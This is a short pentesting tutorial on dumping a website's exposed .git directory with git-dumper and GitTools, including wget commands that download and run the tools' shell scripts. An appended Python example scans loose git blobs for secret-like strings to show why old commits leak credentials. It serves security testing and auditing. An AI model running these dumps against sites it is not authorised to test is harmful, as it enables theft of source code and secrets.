Dump Git Repository from Website

If we have permission to access the Git repository on the target website, we can dump the repository and investigate its logs and history to find sensitive information.

Dumping

Method 1. Git-Dumper

git-dumper is a useful Python package.

pipx install git-dumper
git-dumper https://example.com/.git ./dumped

Method 2. GitTools

GitTools downloads the Git repository of a web application.
To dump the repository, execute the following commands.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example

We should now have the Git repository locally.
Then extract the entire project by executing the following.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example

Now we have retrieved the entire Git project from the website.
It is stored in the “./new_example” folder, where we can investigate the repository.

After Dumping…

If the dump succeeds, we can investigate the repository with git commands and get sensitive information. See Git GitHub Pentesting.
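
Why the history matters, shown as an added example (not part of the original page or of either tool): a secret replaced in a later commit still sits in the object store, so anyone auditing their own repository after an exposure has to review old blobs, not just the current tree. The pattern, helper names and sample contents are constructed for illustration, and only loose objects are read; packed objects need git itself, for example `git log -p --all`.

```python
import hashlib
import os
import re
import tempfile
import zlib

# Constructed pattern for secret-like assignments; tune it for your own codebase.
SECRET_RE = re.compile(rb"(?i)(password|secret|api[_-]?key|token)\s*[=:]\s*\S+")

def scan_loose_objects(git_dir):
    """Return [(object_id, matched_text)] for every loose blob holding a secret-like line."""
    findings = []
    objects = os.path.join(git_dir, "objects")
    for fan in sorted(os.listdir(objects)):
        if not re.fullmatch(r"[0-9a-f]{2}", fan):
            continue  # skip pack/ and info/
        for name in sorted(os.listdir(os.path.join(objects, fan))):
            try:
                with open(os.path.join(objects, fan, name), "rb") as fh:
                    raw = zlib.decompress(fh.read())
            except (OSError, zlib.error):
                continue  # unreadable or partially written object
            header, _, body = raw.partition(b"\x00")
            if header.split(b" ")[0] != b"blob":
                continue  # commits and trees hold no file content
            for m in SECRET_RE.finditer(body):
                findings.append((fan + name, m.group(0).decode("utf-8", "replace")))
    return findings

def write_loose_blob(git_dir, content):
    """Demo helper: store content the way git stores a loose blob."""
    raw = b"blob %d\x00" % len(content) + content
    oid = hashlib.sha1(raw).hexdigest()
    fan_dir = os.path.join(git_dir, "objects", oid[:2])
    os.makedirs(fan_dir, exist_ok=True)
    with open(os.path.join(fan_dir, oid[2:]), "wb") as fh:
        fh.write(zlib.compress(raw))
    return oid

def demo():
    """Two constructed versions of one config file: the old one still carries the secret."""
    with tempfile.TemporaryDirectory() as tmp:
        git_dir = os.path.join(tmp, ".git")
        old = write_loose_blob(git_dir, b"DB_PASSWORD=constructed-example\n")
        new = write_loose_blob(git_dir, b"# credentials now come from the environment\n")
        return old, new, scan_loose_objects(git_dir)

if __name__ == "__main__":
    print(demo())
```

Any credential the scan reports should be treated as disclosed and rotated, even if the current working tree no longer contains it.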